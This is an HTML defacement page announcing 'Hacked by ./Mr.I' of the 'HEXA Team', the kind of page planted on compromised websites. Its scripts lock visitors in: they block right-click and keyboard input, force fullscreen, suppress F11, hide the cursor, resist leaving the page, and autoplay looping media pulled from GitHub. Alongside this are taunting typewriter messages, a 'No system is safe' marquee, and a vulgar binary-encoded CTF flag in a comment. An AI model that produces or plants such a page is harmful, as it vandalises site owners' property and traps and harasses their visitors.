<html>
  <!-- Script kiddies -->
  <!-- HEXA Team -->
  <!-- CARI TERUS MASEH -->

  <head>
    <title>Hacked by ./Mr.I</title>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="title" content="Hacked by ./Mr.I" />
    <meta name="description" content="What The Fuck" />
    <meta name="keywords" content="hacked,deface,wordpress,website,whitehat,blackhat,defacer,hack,mirror,Mr. I" />
    <meta name="robots" content="index, follow" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="language" content="English" />
    <meta name="revisit-after" content="60 days" />
    <meta name="author" content="HEXA Team" />
    <meta property="og:image" content="https://i.imgur.com/n4qxwp5.png" />
    <meta name="theme-color" content="#000" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
    <style type="text/css">
      body,
      a:hover {
        cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important;
      }
    </style>
  </head>
  <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()">
    <style type="text/css">
      center {
        font-family: Courier;
      }

      img {
        opacity: 80%;
      }

      red {
        color: red;
      }

      #background-video {
        height: 100vh;
        width: 100vw;
        object-fit: cover;
        position: fixed;
        left: 0;
        right: 0;
        top: 0;
        bottom: 0;
        z-index: -1;
      }

      font {
        text-shadow: #000 0px 0px 3px;
        -webkit-font-smoothing: antialiased;
      }

      div {
        animation: glitch 1s linear infinite;
      }

      @keyframes glitch {
        2%,
        64% {
          transform: translate(2px, 0) skew(0deg);
        }

        4%,
        60% {
          transform: translate(-2px, 0) skew(0deg);
        }

        62% {
          transform: translate(0, 0) skew(5deg);
        }
      }

      div:before,
      div:after {
        content: attr(title);
        position: absolute;
        left: 0;
      }

      div:before {
        animation: glitchTop 1s linear infinite;
        clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
        -webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
      }

      @keyframes glitchTop {
        2%,
        64% {
          transform: translate(2px, -2px);
        }

        4%,
        60% {
          transform: translate(-2px, 2px);
        }

        62% {
          transform: translate(13px, -1px) skew(-13deg);
        }
      }

      div:after {
        animation: glitchBotom 1.5s linear infinite;
        clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
        -webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
      }

      @keyframes glitchBotom {
        2%,
        64% {
          transform: translate(-2px, 0);
        }

        4%,
        60% {
          transform: translate(-2px, 0);
        }

        62% {
          transform: translate(-22px, 5px) skew(21deg);
        }
      }
    </style>
    <script language="JavaScript">
      window.onbeforeunload = confirmExit;

      function confirmExit() {
        return "are you sure ? wkwk";
      }

      function fs() {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
          elem.requestFullscreen();
        } else if (elem.msRequestFullscreen) {
          elem.msRequestFullscreen();
        } else if (elem.mozRequestFullScreen) {
          elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) {
          elem.webkitRequestFullscreen();
        }
        document.getElementById("body").style.cursor = "none";
        document.onkeydown = function (e) {
          return false;
        };
        document.addEventListener("keydown", (e) => {
          if (e.key == "F11") e.preventDefault();
        });
      }
    </script>
    <script id="rendered-js">
      document.addEventListener("DOMContentLoaded", function (event) {
        // array with texts to type in typewriter
        var dataText = [
          "Firewall breached, but we're on it.",
          "Lock and load, we're defending your network.",
          "The cyber battlefield is our domain.",
          "Hacking attempt thwarted. Better luck next time.",
          "Stay calm, we've got this under control.",
          "Your security is our top priority.",
          "Encryption level: Fort Knox.",
          "We don't fear hackers, we make them fear us.",
          "Cybersecurity is not a game, but we're winning anyway.",
        ];

        // type one text in the typwriter
        // keeps calling itself until the text is finished
        function typeWriter(text, i, fnCallback) {
          // chekc if text isn't finished yet
          if (i < text.length) {
            // add next character to h1

            document.getElementById("hekerabies").innerHTML = text.substring(0, i + 1);

            // wait for a while and call this function again for next character
            setTimeout(function () {
              typeWriter(text, i + 1, fnCallback);
            }, 150);
          }
          // text finished, call callback if there is a callback function
          else if (typeof fnCallback == "function") {
            // call callback after timeout
            setTimeout(fnCallback, 7000);
          }
        }
        /*
  01000011 01010100 01000110 01111011 01001011 01001111 01001110 01010100 01001111 01001100 01011111 01000011 01001001 01000011 01000001 01001011 01111101
  */
        // start a typewriter animation for a text in the dataText array
        function StartTextAnimation(i) {
          if (typeof dataText[i] == "undefined") {
            setTimeout(function () {
              StartTextAnimation(0);
            }, 30000);
          }
          // check if dataText[i] exists
          if (i < dataText[i].length) {
            // text exists! start typewriter animation
            typeWriter(dataText[i], 0, function () {
              // after callback (and whole text has been animated), start next text
              StartTextAnimation(i + 1);
            });
          }
        }
        //BANG FLAGNYA MANA
        // start the text animation
        StartTextAnimation(0);
      });

      //# sourceURL=pen.js
    </script>
    <audio src="https://github.com/hexa45/source/raw/main/hexa.m4a" autoplay="true" id="lagu" loop=""></audio>
    <video
      id="background-video"
      src="https://github.com/hexa45/source/raw/main/hexa.mp4"
      autoplay=""
      loop=""
      muted=""
      style="position: fixed; object-fit: cover"
      poster="data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII="
    >
      <source src="https://github.com/hexa45/source/raw/main/hexa.mp4" type="video/mp4" />
    </video>
    <table width="100%" height="80%">
      <td>
        <center>
          <small>HEXA Team</small>
          <br />
          <img src="https://i.imgur.com/n4qxwp5.png" width="220" height="220" loading="lazy" onerror="this.style.display = 'none'" />
          <br />Hacked by <red><i>./Mr.I</i></red
          ><br />
          <font size="2" id="hekerabies"></font><br /><br />
          <small>
            <font size="5" color="red" font-family="Courier New"><i>Remember Me</i></font>
          </small>
          <div class="footer-greetings">
            <marquee>
              <font size="2">
                <b>HEXA Team <span id="footer_copyright"></span></b>| Mr.I | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No
                system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No
                system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No
                system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No
                system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe | No system is safe |
              </font>
            </marquee>
          </div>
        </center>
      </td>
    </table>
    <script>
      let currentDate = new Date();
      let currentYear = currentDate.getFullYear();

      let copyright = document.getElementById("footer_copyright");

      copyright.innerHTML = currentYear;
    </script>
  </body>
</html>
